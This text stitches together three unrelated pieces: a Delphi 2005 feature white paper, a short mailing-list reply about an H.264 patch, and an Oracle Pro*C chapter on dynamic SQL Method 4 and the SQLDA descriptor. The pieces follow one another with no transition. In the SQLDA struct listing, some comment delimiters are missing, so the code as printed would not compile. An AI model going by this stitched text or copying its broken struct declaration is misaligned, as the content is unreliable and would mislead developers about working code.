DUnit is the Delphi version of the unit-testing framework (for both Win32 and .NET), while NUnit is a .NET language neutral unit-testing framework which can be used with both C# and Delphi for .NET. Both DUnit and NUnit are included and integrated with Delphi 2005. For every project, you can add an associated test project to the project group using the New Test Project Wizard. For Delphi Win32 projects, this will use the DUnit test framework. For Delphi for .NET projects, you can select either the .NET version of the DUnit test framework, or the NUnit test framework, and finally for C# projects this will use the NUnit test framework. Both the DUnit (for .NET or Win32) and NUnit test frameworks offer a choice of a GUI or console test runner to execute and display the test results. Within a test project, you can use the New Test Case Wizard to add specific test cases for units that belong to the project. For each unit, you can select the classes and methods of these classes that will be added to the test. An example test skeleton can also be generated so you can later add your own tests manually. Once a test project with test cases is maintained, there is a separate test-runner environment that you can start from the Delphi 2005 IDE to run the tests, and view the results. You get feedback on all errors and failures (if any), the tests that were not run, and the output written to the console. Unit testing helps to increase the quality, maintainability and reuse capabilities of your code, and having unit testing integrated into the Delphi 2005 IDE makes it even easier to implement. Borland Delphi 2005 offers ADO.NET-specific as well as VCL and VCL for .NET database support. A number of database enhancements were implemented in Delphi 2005, particularly in the ADO.NET technology, but also to BDE, dbExpress and the availability of dbGo for ADO on .NET.
There are a number of Borland Data Provider for ADO.NET improvements, including support for InterBase Boolean fields, Oracle packages, localized table name support, Schema Name list retrieval, and Sybase 12.5 support. This brings the list of certified BDP ADO.NET data provider drivers to include Microsoft MSDE 2000, Microsoft Access 2000, and Sybase 12.5. There are significant database related ADO.NET designer enhancements in Delphi 2005. There is new Stored Procedure Testing support, where you can specify the stored procedure to test, including the input parameters, and then actually run the stored procedure and view output parameter values (if any).
Delphi 2005 Stored Procedure dialog testing SUB_TOT_BUDGET
A special table mapping feature helps you to specify the table mapping for a BdpDataAdapter, where you can specify the mapping between columns of a DataTable and an in-memory DataSet with more descriptive column names. You can also add or remove columns for the in-memory dataset. The Object Inspector now offers a Connection String Editor for the SQLConnection component, allowing you to specify the connection string for an ADO.NET provider. New ADO.NET components called RemoteServer and RemoteConnection offer RAD support for building multi-tier applications (using the .NET remoting infrastructure). Two other new ADO.NET components, called DataHub and DataSync, offer support for aggregating heterogeneous databases into single datasets. The four components can be combined, resulting in distributed applications using multiple different ADO.NET data providers. In this architecture, the DataHub and RemoteConnection are part of the thin-client tier, while the RemoteServer and DataSync components are part of the server tier, connected to the data providers. The AutoUpdate method of the BdpDataAdapter is also enhanced and is now capable of resolving multi-table updates and better error handling.
A special BDP component called BdpCopyTable supports data migration, and enables you to copy tables including data from one BDP supported database to another. Typed Datasets now produce code that compiles to standalone .NET assemblies. Typed Datasets also support datasets from Web Services. The Project Manager offers context menus to start the Relation and Table Collection Editors for a dataset, so you can modify a typed dataset more conveniently. The Database Explorer, for BDP data providers, has been enhanced in several areas as well. It now supports easy data migration from one BDP data provider to another, with a feature that allows you to copy a table from one BDP data provider, and paste the table in another BDP data provider. This will copy and reconstruct the table metadata as well as the data to the target database even if the source and target databases are of completely different vendors; from Oracle to MSSQL for example. This corresponds to the behaviour of the BdpCopyTable component. The Data Explorer offers additional metadata capabilities, and allows you to view and modify the database schema directly from the Data Explorer. You can create new tables, alter tables or drop existing tables. It's also possible to drag a stored procedure directly from the Data Explorer to a Forms Designer, which will create an instance of the BdpConnection (when needed) and BdpCommand, automatically assign the stored procedure to the BdpCommand, and populate the parameters for the stored procedure. Delphi 2005 contains database support for VCL and VCL for .NET applications in the form of BDE, dbExpress and dbGo for ADO as well as InterBase Express (IBX). These data access technologies exist for both VCL and VCL for .NET projects, and offer a seamless migration path from Win32 to .NET.
When building VCL for .NET applications, Delphi 2005 now supports dbGo for ADO for both Win32 and .NET, which also makes migration of Win32 dbGo for ADO applications to the .NET Framework possible. The dbGo for ADO components require MDAC 2.8. The dbExpress components have been extended by a TSimpleDataSet for .NET, better performance for TSQLStoredProc, and metadata improvements. The following certified drivers are available for dbExpress: IBM Informix 9.x, SQL Anywhere 9 (should also work with ASA 8), MySQL 4.0.x, and Sybase 12.5. The Borland Database Engine (BDE) - for VCL or VCL for .NET applications - supports local dBASE and Paradox tables. The BDE for .NET has been enhanced with the ability to dynamically load the BDE DLLs, without the need to specify the path. It also offers increased BLOB performance, and includes some of the BDE components for .NET that were not available before, namely TUpdateSQL, TNestedTable, and TStoredProc. InterBase Express (IBX) offers direct connectivity to InterBase for VCL as well as VCL for .NET applications. Delphi 2005 contains a number of Web development enhancements both for VCL (for Win32 and .NET) and ASP.NET. Delphi 2005 now contains a special Web Deployment Manager, which can be used for ASP.NET Web Form and ASP.NET Web Service projects, as well as IntraWeb for both VCL and VCL for .NET. The Web Deployment Manager can be used to connect to either a directory (local or on a network) or an FTP target. The Deployment View will show both the local files (from the project directory) and the remote files (from the directory or FTP location), and gives you the option to deploy the entire project in one click. You can also compare files, remove files, etc. Deployment settings are stored with your project, so you can always redeploy with your specific settings at a later time. This is very powerful and ideal for fast deployment.
Apart from supporting ASP.NET and IntraWeb projects, the Web Deployment Manager can be extended to support other project types as well. The DB Web controls can be used to build powerful data-driven ASP.NET Web Form applications. Delphi 2005 introduces a number of new DB Web controls, including DBWebAggregateControl, DBWebSound, DBWebVideo, and DBWebNavigationExtender. The DBWebAggregateControl can be used to display aggregate values of columns from a dataset. Available aggregate operations include Avg, Count, Min, Max, and Sum. The DBWebSound and DBWebVideo controls are included to support audio and video formats, connecting through a DBWebDataSource to fields from a dataset or from a URL. The DBWebNavigationExtender is especially helpful in situations where you want to allow updates to be sent to the database, but without using the DBWebNavigation control (specifically the ApplyToServer button of this control). The DBWebNavigationExtender is a non-visual control that can be used to extend standard Web Controls - like a Button - with the functionality of the DBWebNavigator buttons. So you can build your own navigation controls. Apart from these four new DB Web controls, the DbWebDataSource has been extended with a new OnAutoApplyRequest event, and now supports cascading updates and deletes. Apart from the DbWebDataSource, DB Web controls can now also connect to an EcoDataSource - which hooks to an ECO II ExpressionHandler. Delphi 2005 also offers a New DB Web Control wizard that enables you to write your own DB Web compatible ASP.NET control (which can also connect to a DbWebDataSource or EcoDataSource). The DB Web controls now support XML Caching, which is a powerful feature that can be used as a server-side briefcase for web clients. 
Delphi 2005 DB Web controls now have the ability to control the navigation order, using a Navigation API with RegisterNextControl, RegisterPreviousControl, RegisterFirstControl, RegisterLastControl, RegisterInsertControl, RegisterDeleteControl, RegisterUpdateControl, RegisterCancelControl, RegisterUndoControl, RegisterUndoAllControl, RegisterApplyControl, RegisterRefreshControl, and RegisterGoToControl. ASP.NET HTML controls can now be represented as controls in the code-behind file, by using the Run As Server Control option which adds the runat=server attribute to the scripting control, as well as a control declaration in the code-behind source file. Delphi 2005 now supports Template Editors for the DataGrid and DataList controls, enabling you to define and easily edit your own custom template columns. When using VCL (for Win32 or .NET), Delphi 2005 supports web applications with IntraWeb from AtoZed Software. IntraWeb offers RAD WYSIWYG design for Web applications, in many aspects like ASP.NET, but also different in certain areas. The main advantage of IntraWeb is its support for transparent user and state management, which ASP.NET does not offer. IntraWeb Web applications are compatible with non-visual VCL components, like the data-access categories BDE, dbExpress, dbGo for ADO and InterBase Express (which means a migration path from Win32 to .NET), whereas ASP.NET applications use native .NET components with ADO.NET and BDP for data access capabilities. Borland C#Builder 1.0 and Borland Delphi 8 included the first version of Enterprise Core Objects (ECO), which is greatly enhanced for highly scalable enterprise application development in Delphi 2005. There are several enhancements available in Enterprise Core Objects II compared to the initial version.
The most important ECO II enhancements can be summarized as follows:
- support for scalable, distributed applications
- support for ASP.NET (both Web Forms and Web Services)
- support for mapping from existing databases
- overall ease-of-use enhancements to make life in the ECO space easier
Most importantly, ECO II is now enterprise scalable. Where the first version was a client/server solution, ECO II supports both client/server and remote solutions. There are several possible architectures, out of the box, for building scalable ASP.NET or WinForms applications. Synchronizing multiple object caches (i.e. EcoSpaces), either in the same process or in multiple separate processes, is managed by the new extended PersistenceMapper. The synchronizing persistence mapper can itself be executing within the same process or, more likely, in a process on a server. Using Delphi 2005 we can now combine ECO II and ASP.NET, for use in both ASP.NET Web Forms and ASP.NET Web Services. The Borland DB Web controls can expose objects within an EcoSpace through binding to the new EcoDataSource component, which uses an OCL expression to provide a datasource, and can be used to produce visual data-aware ASP.NET Web Form applications. The same can be done with any regular native ASP.NET Web control. ECO components, such as the ExpressionHandler, provide a list of elements that can be used as a DataSet, and hence bind to any ASP.NET component, including DataList and DataGrid. Since requests in ASP.NET applications are stateless, we can maintain the EcoSpace state either in the session or at the application level. ECO II uses optimistic locking, and when a conflict occurs, conflict resolution is used to determine the correct actions. Specifically, when an EcoSpace detects that a value in the actual database is different from the supposed "old value" in the EcoSpace, it registers a conflict in an internal list in the EcoSpace.
The developer can call RetrieveChanges for any changes done by other EcoSpaces, and GetChanges for any unresolved conflicts that can then be resolved (usually interactively by the end user).
Delphi 2005 ECO II ASP.NET Web Form at design-time
With Enterprise Core Objects II in Delphi 2005 it's now possible to develop applications that use existing databases for persistence, through the new enhanced Object-Relational mapping which is driven by XML schema files. This powerful new feature can be used to reverse an existing Microsoft SQL Server, Oracle or InterBase database, and create the mapping schema file as well as the UML model, with classes wrapping the database tables.
Delphi 2005 and Northwind database imported in ECO II Model
The EcoSpace Designer has a number of additional capabilities in Delphi 2005, including the ability to generate a default mapping schema XML file, to convert an ECO I type database to ECO II format, and to reverse/wrap an existing database. The EcoSpace Designer has also been enhanced with new tooltip hints that show a list of the usage tasks that need to be done, for example for the PersistenceMapperBdp.
Delphi 2005 ECO II design-time tooltip hints
The tasks that are done will automatically be checked, so you always have an up-to-date overview of what's done and what steps remain to be done. In another example where tooltip hints are used: when you want to open a new ECO Package, the hints will show all classes defined in the selected ECO Package. Delphi 2005 can now produce several different ECO II projects. For the C# personality, we can create an ECO ASP.NET Web Application, an ECO ASP.NET Web Service, an ECO Package in DLL (so we can use the EcoSpace in another project that uses this DLL), and an ECO WinForms Application. For the Delphi for .NET personality, we can create an ECO ASP.NET Web Application, an ECO ASP.NET Web Service, and an ECO WinForms Application.
Delphi 2005 integrates with tools from the Borland Application Lifecycle Management suite including CaliberRM, StarTeam, and Janeva. StarTeam offers support for source code version control, as well as requirements management, defect tracking, threaded discussion groups, and distributed collaboration. Delphi 2005 contains an integrated StarTeam client, available through the StarTeam menu as well as the Project Manager context menu, which allows you to operate StarTeam from within the Delphi 2005 IDE. You can place projects into StarTeam, check in files, check out files, revert to older versions, lock and unlock files in the StarTeam repository, and more. Furthermore, the History Manager supports StarTeam, so backups can be accessed and compared or restored from either local backups or the StarTeam repository. Delphi 2005 contains Janeva support (in the Enterprise and Architect editions). Janeva can be used to connect a .NET client application (written in C# or Delphi for .NET) to a J2EE Enterprise JavaBean or CORBA object. When Janeva is installed (as well as the Janeva IDE plug-in), you get two new menu options for the project node in the Project Manager, Add J2EE Reference... and Add CORBA Reference..., to add the specific reference. The Add J2EE Reference... starts a dialog where you can select an EJB from a .jar file, while the Add CORBA Reference... starts a dialog where you need to select an .idl file that contains the interface definition of the CORBA object. After importing the .jar or .idl file, the result is a native object that can be used by the .NET client, and will go through the Janeva assemblies for a direct connection to the J2EE Enterprise JavaBean or the CORBA object, without the need for additional layers (like a Web Service or gateway software). Previous versions of the Janeva plug-in (for C#Builder) generated C# code, but the Janeva integration in Delphi 2005 generates assemblies that can be used with any .NET language.
The Janeva plug-in wizard now automatically generates a corresponding app.config file with the required Janeva parameters for your Janeva client project. *Janeva requires a runtime license to deploy your application. This is available from your Borland sales representative. There are many enhancements to the Delphi compiler, language and debugger of Delphi 2005. Several performance enhancements have been implemented for the Delphi 2005 compiler, resulting in even faster compilation speeds. The compiler now also supports Unicode and UTF8 source code files, as well as Unicode characters in identifiers and symbols. The Delphi language has been extended with a new for-loop syntax, similar to the foreach construct. This powerful new language feature can be used to iterate through a set of values. Both the Win32 and .NET Delphi languages are extended with function inlining, which can result in faster performance. Instead of calling a routine, the code from the routine itself is expanded in place of the call (saving a call and return, as well as parameter management). This is especially beneficial for small routines, routines outside your unit scope, or routines with many parameters. For bigger routines, the trade-off between efficiency at the cost of bigger code size should be considered carefully before applying inline. We can either inline routines explicitly with the inline directive, or use an {$INLINE AUTO} compiler directive. The latter will leave it up to the compiler to select routines for inlining that are likely to improve your performance. Using {$INLINE ON} you specify that a set of routines will all be inlined from that point on. There are a number of exceptions regarding routines that cannot be inlined by the compiler. Although you can inline routines from different units in a package (assembly), you cannot inline routines across package boundaries, for example.
It's also not possible to inline virtual, dynamic or message methods, as well as methods of interfaces and dispinterfaces. The previous version of the Delphi for .NET compiler used a mapping of one unit per namespace (where the name of the unit would be the name of the namespace). This has been expanded in Delphi 2005, where a namespace can now be made up of several units. With a unit name of, for example, Comp.Group.MyUnit.pas, the left-hand side Comp.Group is the name of the namespace, and MyUnit.pas the local unit scope within the namespace. This allows us to write multiple units and make them all belong to a single namespace (ideal for ASP.NET custom controls, which can now get a single control prefix). As another consequence of this new namespace feature in Delphi 2005, it's now also possible to use Delphi 2005 in order to extend existing namespaces with our own functionality. For example, the System.Web namespace can be extended with classes and types from a System.Web.MyUnit.pas unit. The namespace extension becomes part of any application or assembly that contains the System.Web.MyUnit.pas. The Delphi 2005 Win32 debugger now includes better support for Win32 stack frames that do not have debug information. Also included is a special dialog for handling exceptions when debugging within the IDE. When an exception is raised, a dialog will pop up that offers you the chance to ignore this exception type, or inspect the exception object, including the option to actually Break or Continue. The Breakpoint List has been enhanced with in-place editing, most notably of the condition or the group, and the enabling of breakpoints can now be done with checkboxes. This avoids dialogs and speeds up the configuration of our breakpoints.
Delphi 2005 Breakpoint List with editable Condition field
There is also a new toolbar in the Breakpoint window, which can be used to delete breakpoints, delete all, enable all at once, disable all, or edit the breakpoint properties. Delphi 2005 contains four new Delphi views. Where Borland Delphi 8 for .NET offered Debug views of Breakpoints, Call Stack, Watches, Threads and the Event Log, Delphi 2005 adds the FPU, Local Variables, CPU and Modules views. The Modules view displays the App Domains, and allows you to drill down into the details of the namespaces and assemblies loaded within each App Domain. You'll now be able to sort the items in the Modules view by name or base address. The CPU view shows the original source code, the IL (Intermediate Language) as well as native machine assembly and opcodes.
Delphi 2005 CPU View with mixed Pascal, ILASM and machine code
Using the Delphi 2005 IDE it's not only possible to load multiple projects using the Project Manager (in a Project Group), you can also run the Win32 and .NET debuggers side-by-side, allowing you to run and debug both the Win32 and the .NET application from the same development environment. You can even run both debuggers at the same time, switching from project to project (and personality to personality) in the Project Manager. This white paper has covered the key new features in Delphi 2005, as well as enhancements to existing technology areas. As you've seen, the IDE has been enhanced with a new welcome page, support for multiple personalities, backup and file history support (with optional integration with StarTeam), floating VCL designers, Sync Edit, Error Insight, Help Insight, a Structure View, Find References, a better way to view search results, and Tool Palette Wizards that help you to start new applications even quicker.
Refactoring is also one of the main new features in Delphi 2005, offering features from Rename Symbols, Declare Variable, Declare Field, Extract Method, and Extract Resource String to Import Namespace. Another great addition is support for unit testing with DUnit and NUnit, plus IDE integration with Test Project and Test Case wizards. At the database side, the BDP components have been extended with new drivers, a BdpCopyTable component, DataSync and DataHub components for heterogeneous database support, and RemoteServer plus RemoteConnection components for building multi-tier .NET database applications (using DataSync and DataHub, so even heterogeneous and multi-tier if you wish). For Web development, the ASP.NET debugging is enhanced, there are new dbWeb controls for aggregate values, audio, video and navigator action events, support for template editors for the DataGrid and DataList, and finally IntraWeb is included for Win32 as well as .NET Web applications. Enterprise Core Objects (now ECO II) has been enhanced with support for scalable, distributed applications, support for ASP.NET (both regular and dbWeb controls), and the ability to map an existing database in an ECO model. Delphi 2005 offers integration with Borland ALM tools including StarTeam and Janeva (for connectivity to J2EE and CORBA servers). Last but not least, the compiler and Delphi language have been enhanced with many new features like the new for..in..do loop, function inlining, and multi-unit namespaces, and the debugger has been enhanced with a better breakpoint list, new debug views for .NET, and side-by-side debugging of Win32 and .NET projects. Whether your goal is to develop components or applications for the Microsoft Windows Operating System, or for the Microsoft .NET Framework version 1.1, Delphi 2005 offers extensive, high-productivity and high-quality support for modern Windows development.
Stefan Gehrer <stefan.gehrer at gmx.de> writes:

> On 06/30/2010 10:54 PM, Jason Garrett-Glaser wrote:
>> 2010/6/30 Måns Rullgård <mans at mansr.com>:
>>> J).
>>
>> Then we should do an ifdef of some sort to get optimal behavior in all
>> situations.
>
> New patch, I realised that ff_h264_norm_shift_old is actually not in
> use in H.264 but only ff_h264_norm_shift.
> And I added a debatable #if
> Stefan
>
> +#if HAVE_FAST_CLZ
> +    shift = 7 - av_log2(c->high);
> +#else
> +    shift = ff_h264_norm_shift[c->high] - 1;
> +#endif

Remove this #if for now. We'll make it even better later.

--
Måns Rullgård
mans at mansr.com
This chapter shows you how to implement Oracle dynamic SQL Method 4, which lets your program accept or build dynamic SQL statements that contain a varying number of host variables. Use this to support existing applications. Use ANSI Dynamic SQL Method 4 for all new applications. Oracle Dynamic SQL Method 4 does not support object types, cursor variables, arrays of structs, DML returning clauses, Unicode variables, and LOBs. Use ANSI Dynamic SQL Method 4 instead. This chapter contains the following topics:
- Meeting the Special Requirements of Method 4
- Using the SQLDA Variables
- A Closer Look at Each Step
- Example Program: Dynamic SQL Method 4
- Sample Program: Dynamic SQL Method 4 using Scrollable Cursors
Before looking into the requirements of Method 4, you should feel comfortable with the terms select-list item and placeholder. Select-list items are the columns or expressions following the keyword SELECT in a query. For example, the following dynamic query contains three select-list items:

    SELECT ename, job, sal + comm
        FROM emp
        WHERE deptno = 20

Placeholders are dummy bind variables that hold places in a SQL statement for actual bind variables. You do not declare placeholders, and can name them anything you like. Placeholders for bind variables are most often used in the SET, VALUES, and WHERE clauses. For example, the following dynamic SQL statements each contain two placeholders:

    INSERT INTO emp (empno, deptno) VALUES (:e, :d)

    DELETE FROM dept WHERE deptno = :num OR loc = :loc

Unlike Methods 1, 2, and 3, dynamic SQL Method 4 lets your program
- Accept or build dynamic SQL statements that contain an unknown number of select-list items or placeholders, and
- Take explicit control over datatype conversion between Oracle and C types
To add this flexibility to your program, you must give the Oracle runtime library additional information. The Pro*C/C++ Precompiler generates calls to Oracle for all executable dynamic SQL statements.
If a dynamic SQL statement contains no select-list items or placeholders, Oracle needs no additional information to execute the statement. The following DELETE statement falls into this category:

    DELETE FROM emp WHERE deptno = 30

However, most dynamic SQL statements contain select-list items or placeholders for bind variables, as does the following UPDATE statement:

    UPDATE emp SET comm = :c WHERE empno = :e

To execute a dynamic SQL statement that contains placeholders for bind variables or select-list items, Oracle needs information about the program variables that hold the input (bind) values, and that will hold the FETCHed values when a query is executed. The information needed by Oracle is:
- The number of bind variables and select-list items
- The length of each bind variable and select-list item
- The datatype of each bind variable and select-list item
- The address of each bind variable, and of the output variable that will receive each select-list item
All the information Oracle needs about select-list items or placeholders for bind variables, except their values, is stored in a program data structure called the SQL Descriptor Area (SQLDA). The SQLDA struct is defined in the sqlda.h header file. Descriptions of select-list items are stored in a select descriptor, and descriptions of placeholders for bind variables are stored in a bind descriptor. The values of select-list items are stored in output variables; the values of bind variables are stored in input variables. You store the addresses of these variables in the select or bind SQLDA so that Oracle knows where to write output values and read input values. How do values get stored in these data variables? Output values are FETCHed using a cursor, and input values are typically filled in by the program, usually from information entered interactively by the user. The bind and select descriptors are usually referenced by pointer.
A dynamic SQL program should declare a pointer to at least one bind descriptor, and a pointer to at least one select descriptor, in the following way:

    #include <sqlda.h>
    ...
    SQLDA *bind_dp;
    SQLDA *select_dp;

You can then use the SQLSQLDAAlloc() function to allocate the descriptor, as follows:

    bind_dp = SQLSQLDAAlloc(runtime_context, size, name_length, ind_name_length);

SQLSQLDAAlloc() was known as sqlaldt() before Oracle8. The constant SQL_SINGLE_RCTX is defined as (dvoid*)0. Use it for runtime_context when your application is single-threaded. You use the DESCRIBE statement to help obtain the information Oracle needs. The DESCRIBE SELECT LIST statement examines each select-list item to determine its name and name length. It then stores this information in the select SQLDA for your use. For example, you might use select-list names as column headings in a printout. The total number of select-list items is also stored in the SQLDA by DESCRIBE. The DESCRIBE BIND VARIABLES statement examines each placeholder to determine its name and length, then stores this information in an input buffer and bind SQLDA for your use. For example, you might use placeholder names to prompt the user for the values of bind variables. This section describes the SQLDA data structure in detail. You learn how to declare it, what variables it contains, how to initialize them, and how to use them in your program. Method 4 is required for dynamic SQL statements that contain an unknown number of select-list items or placeholders for bind variables. To process this kind of dynamic SQL statement, your program must explicitly declare SQLDAs, also called descriptors. Each descriptor is a struct which you must copy or code into your program.
A bind descriptor holds descriptions of bind variables and indicator variables, and the addresses of input buffers where the names and values of bind variables and indicator variables are stored. If your program has more than one active dynamic SQL statement, each statement must have its own SQLDA(s). You can declare any number of SQLDAs with different names. For example, you might declare three select SQLDAs named sel_desc1, sel_desc2, and sel_desc3, so that you can FETCH from three concurrently OPEN cursors. However, non-concurrent cursors can reuse SQLDAs. To declare a SQLDA, include the sqlda.h header file. The contents of the SQLDA are: struct SQLDA { long N; /* Descriptor size in number of entries */ char **V; Ptr to Arr of addresses of main variables */ long *L; /* Ptr to Arr of lengths of buffers */ short *T; /* Ptr to Arr of types of buffers */ short **I; * Ptr to Arr of addresses of indicator vars */ long F; /* Number of variables found by DESCRIBE */ char **S; /* Ptr to Arr of variable name pointers */ short *M; /* Ptr to Arr of max lengths of var. names */ short *C; * Ptr to Arr of current lengths of var. names */ char **X; /* Ptr to Arr of ind. var. name pointers */ short *Y; /* Ptr to Arr of max lengths of ind. var. names */ short *Z; /* Ptr to Arr of cur lengths of ind. var. names */ }; After declaring a SQLDA, you allocate storage space for it with the SQLSQLDAAlloc() library function (known as sqlaldt() before Oracle8), using the syntax: descriptor_name = SQLSQLDAAlloc (runtime_context, max_vars, max_name, max_ind_name); where: Besides the descriptor, SQLSQLDAAlloc() allocates data buffers to which descriptor variables point. Figure 15-1 shows whether variables are set by SQLSQLDAAlloc() calls, DESCRIBE commands, FETCH commands, or program assignments. Figure 15-1 How Variables Are Set This section explains the purpose and use of each variable in the SQLDA. N specifies the maximum number of select-list items or placeholders that can be DESCRIBEd. 
Thus, N determines the number of elements in the descriptor arrays. Before issuing the optional DESCRIBE command, you must set N to the dimension of the descriptor arrays using the SQLSQLDAAlloc() library function. After the DESCRIBE, you must reset N to the actual number of variables DESCRIBEd, which is stored in the F variable. V is a pointer to an array of addresses of data buffers that store select-list or bind-variable values. When you allocate the descriptor, SQLSQLDAAlloc() zeros the elements V[0] through V[N - 1] in the array of addresses. For select descriptors, you must allocate data buffers and set this array before issuing the FETCH command. The statement EXEC SQL FETCH ... USING DESCRIPTOR ... directs Oracle to store FETCHed select-list values in the data buffers to which V[0] through V[N - 1] point. Oracle stores the ith select-list value in the data buffer to which V[i] points. For bind descriptors, you must set this array before issuing the OPEN command. The statement EXEC SQL OPEN ... USING DESCRIPTOR ... directs Oracle to execute the dynamic SQL statement using the bind-variable values to which V[0] through V[N - 1] point. Oracle finds the ith bind-variable value in the data buffer to which V[i ] points. L is a pointer to an array of lengths of select-list or bind-variable values stored in data buffers. For select descriptors, DESCRIBE SELECT LIST sets the array of lengths to the maximum expected for each select-list item. However, you might want to reset some lengths before issuing a FETCH command. FETCH returns at most n characters, where n is the value of L[i ] before the FETCH. The format of the length differs among Oracle datatypes. For CHAR or VARCHAR2 select-list items, DESCRIBE SELECT LIST sets L[i ] to the maximum length of the select-list item. For NUMBER select-list items, scale and precision are returned respectively in the low and next-higher bytes of the variable. 
You can use the library function SQLNumberPrecV6() to extract precision and scale values from L[i ]. See also "Extracting Precision and Scale ". You must reset L[i ] to the required length of the data buffer before the FETCH. For example, when coercing a NUMBER to a C char string, set L[i ] to the precision of the number plus two for the sign and decimal point. When coercing a NUMBER to a C float, set L[i ] to the length of floats on your system. For more information about the lengths of coerced datatypes, see also "Converting Data ". For bind descriptors, you must set the array of lengths before issuing the OPEN command. For example, you can use strlen() to get the lengths of bind-variable character strings entered by the user, then set the appropriate array elements. Because Oracle accesses a data buffer indirectly, using the address stored in V[i ], it does not know the length of the value in that buffer. If you want to change the length Oracle uses for the ith select-list or bind-variable value, reset L[i ] to the length you need. Each input or output buffer can have a different length. T is a pointer to an array of datatype codes of select-list or bind-variable values. These codes determine how Oracle data is converted when stored in the data buffers addressed by elements of the V array. For select descriptors, DESCRIBE SELECT LIST sets the array of datatype codes to the internal datatype (CHAR, NUMBER, or DATE, for example) of the items in the select list. Before FETCHing, you might want to reset some datatypes because the internal format of Oracle datatypes can be difficult to handle. For display purposes, it is usually a good idea to coerce the datatype of select-list values to VARCHAR2 or STRING. For calculations, you might want to coerce numbers from Oracle to C format. The high bit of T[i ] is set to indicate the NULL/not NULL status of the ith select-list item. You must always clear this bit before issuing an OPEN or FETCH command. 
You use the library function SQLColumnNullCheck() to retrieve the datatype code and clear the NULL/not NULL bit. You should change the Oracle NUMBER internal datatype to an external datatype compatible with that of the C data buffer to which V[i ] points. For bind descriptors, DESCRIBE BIND VARIABLES sets the array of datatype codes to zeros. You must set the datatype code stored in each element before issuing the OPEN command. The code represents the external (C) datatype of the data buffer to which V[i ] points. Often, bind-variable values are stored in character strings, so the datatype array elements are set to 1 (the VARCHAR2 datatype code). You can also use datatype code 5 (STRING). To change the datatype of the ith select-list or bind-variable value, reset T[i ] to the datatype you want. I is a pointer to an array of addresses of data buffers that store indicator-variable values. You must set the elements I[0] through I[N - 1] in the array of addresses. For select descriptors, you must set the array of addresses before issuing the FETCH command. When Oracle executes the statement EXEC SQL FETCH ... USING DESCRIPTOR ... if the ith returned select-list value is NULL, the indicator-variable value to which I[i ] points is set to -1. Otherwise, it is set to zero (the value is not NULL) or a positive integer (the value was truncated). For bind descriptors, you must set the array of addresses and associated indicator variables before issuing the OPEN command. When Oracle executes the statement EXEC SQL OPEN ... USING DESCRIPTOR ... the data buffer to which I[i ] points determines whether the ith bind variable has a NULL value. If the value of an indicator variable is -1, the value of its associated bind variable is NULL. F is the actual number of select-list items or placeholders found by DESCRIBE. F is set by DESCRIBE. If F is less than zero, DESCRIBE has found too many select-list items or placeholders for the allocated size of the descriptor. 
For example, if you set N to 10 but DESCRIBE finds 11 select-list items or placeholders, F is set to -11. This feature lets you dynamically reallocate a larger storage area for select-list items or placeholders if necessary. S is a pointer to an array of addresses of data buffers that store select-list or placeholder names as they appear in dynamic SQL statements. You use SQLSQLDAAlloc() to allocate the data buffers and store their addresses in the S array. DESCRIBE directs Oracle to store the name of the ith select-list item or placeholder in the data buffer to which S[i ] points. M is a pointer to an array of maximum lengths of data buffers that store select-list or placeholder names. The buffers are addressed by elements of the S array. When you allocate the descriptor, SQLSQLDAAlloc() sets the elements M[0] through M[N - 1] in the array of maximum lengths. When stored in the data buffer to which S[i ] points, the ith name is truncated to the length in M[i ] if necessary. C is a pointer to an array of current lengths of select-list or placeholder names. DESCRIBE sets the elements C[0] through C[N - 1] in the array of current lengths. After a DESCRIBE, the array contains the number of characters in each select-list or placeholder name. X is a pointer to an array of addresses of data buffers that store indicator-variable names. You can associate indicator-variable values with select-list items and bind variables. However, you can associate indicator-variable names only with bind variables. So, X applies only to bind descriptors. Use SQLSQLDAAlloc() to allocate the data buffers and store their addresses in the X array. DESCRIBE BIND VARIABLES directs Oracle to store the name of the ith indicator variable in the data buffer to which X[i ] points. Y is a pointer to an array of maximum lengths of data buffers that store indicator-variable names. Like X, Y applies only to bind descriptors. 
You use SQLSQLDAAlloc() to set the elements Y[0] through Y[N - 1] in the array of maximum lengths. When stored in the data buffer to which X[i] points, the ith name is truncated to the length in Y[i] if necessary.

Z is a pointer to an array of current lengths of indicator-variable names. Like X and Y, Z applies only to bind descriptors. DESCRIBE BIND VARIABLES sets the elements Z[0] through Z[N - 1] in the array of current lengths. After a DESCRIBE, the array contains the number of characters in each indicator-variable name.

You need a working knowledge of the following subjects to implement dynamic SQL Method 4:

Handling NULL/Not NULL Datatypes

This section provides more detail about the T (datatype) descriptor array. In host programs that use neither datatype equivalencing nor dynamic SQL Method 4, the conversion between Oracle internal and external datatypes is determined at precompile time. By default, the precompiler assigns a specific external datatype to each host variable in the Declare Section. For example, the precompiler assigns the INTEGER external datatype to host variables of type int.

However, Method 4 lets you control data conversion and formatting. You specify conversions by setting datatype codes in the T descriptor array.

Internal datatypes specify the formats used by Oracle to store column values in database tables, as well as the formats used to represent pseudocolumn values. When you issue a DESCRIBE SELECT LIST command, Oracle returns the internal datatype code for each select-list item to the T descriptor array. For example, the datatype code for the ith select-list item is returned to T[i].

Table 15-1 shows the Oracle internal datatypes and their codes:

External datatypes specify the formats used to store values in input and output host variables. The DESCRIBE BIND VARIABLES command sets the T array of datatype codes to zeros. So, you must reset the codes before issuing the OPEN command.
The codes tell Oracle which external datatypes to expect for the various bind variables. For the ith bind variable, reset T[i] to the external datatype you want. Table 15-2 shows the Oracle external datatypes and their codes, as well as the C datatype normally used with each external datatype.

For a select descriptor, DESCRIBE SELECT LIST can return any of the Oracle internal datatypes. Often, as in the case of character data, the internal datatype corresponds exactly to the external datatype you want to use. However, a few internal datatypes map to external datatypes that can be difficult to handle. So, you might want to reset some elements in the T descriptor array. For example, you might want to reset NUMBER values to FLOAT values, which correspond to float values in C. Oracle does any necessary conversion between internal and external datatypes at FETCH time. So, be sure to reset the datatypes after the DESCRIBE SELECT LIST but before the FETCH.

For a bind descriptor, DESCRIBE BIND VARIABLES does not return the datatypes of bind variables, only their number and names. Therefore, you must explicitly set the T array of datatype codes to tell Oracle the external datatype of each bind variable. Oracle does any necessary conversion between external and internal datatypes at OPEN time.

When you reset datatype codes in the T descriptor array, you are "coercing datatypes." For example, to coerce the ith select-list value to STRING, you use the following statement:

/* Coerce select-list value to STRING. */
select_des->T[i] = 5;

When coercing a NUMBER select-list value to STRING for display purposes, you must also extract the precision and scale bytes of the value and use them to compute a maximum display length. Then, before the FETCH, you must reset the appropriate element of the L (length) descriptor array to tell Oracle the buffer length to use.
